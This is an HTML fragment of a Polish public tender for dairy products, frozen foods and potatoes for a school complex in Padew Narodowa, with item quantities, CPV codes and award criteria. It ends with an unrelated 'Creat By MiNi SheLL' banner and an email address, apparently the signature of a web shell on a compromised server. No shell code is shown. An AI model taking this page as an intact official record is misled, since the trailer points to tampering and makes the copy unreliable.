<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa nabiału dla Zespołu Szkół w Padwi Narodowej
Lp.	Nazwa	Nazwa JM	Ilość
1	2	3	4
1	Śmietana 18%  400g	szt	1 100
2	Masło    200g	szt	 1 500
3	Ser biały półtłusty 	kg	200
4	Jajka	szt	8 000
5	Ser żółty salami	kg	   35
6	Jogurt wieloowocowy pitny 150 g	szt.	1 500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3, 15.51.00.00-0, 15.53.00.00-2, 15.54.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin płatności - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa mrożonek dla Zespołu Szkół w Padwi Narodowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa mrożonek dla Zespołu Szkół w Padwi Narodowej
Lp.	Nazwa	Nazwa JM	Ilość
1	2	3	4
1	Paluszki rybne (FROSTA lub równoważne)	kg	252
2	Pierogi ruskie 450g (SWISS-POL lub równoważne)	szt	3 060
3	Kalafior mrożony 2000g	kg	38
4	Mieszanka wielowarzywna 2500g	kg	150
5	Brokuły mrożone 2000g	kg	50
6	Fasolka szparagowa żółta 2500g	kg	37,5
7	Fasola szparagowa zielona 2500g	kg	37,5
8	Filet z ryby Limanda	kg	200
9	Filet z ryby (Miruna) SHP BS	kg	336.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin płatności - 1</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa ziemniaków dla Zespołu Szkół w Padwi Narodowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa ziemniaków dla Zespołu Szkół w Padwi Narodowej
Lp.	Nazwa	Nazwa JM	Ilość
1	2	3	4
1	Ziemniaki	kg	  6 500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 99</li>
<li>2. Termin płatności - 1</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com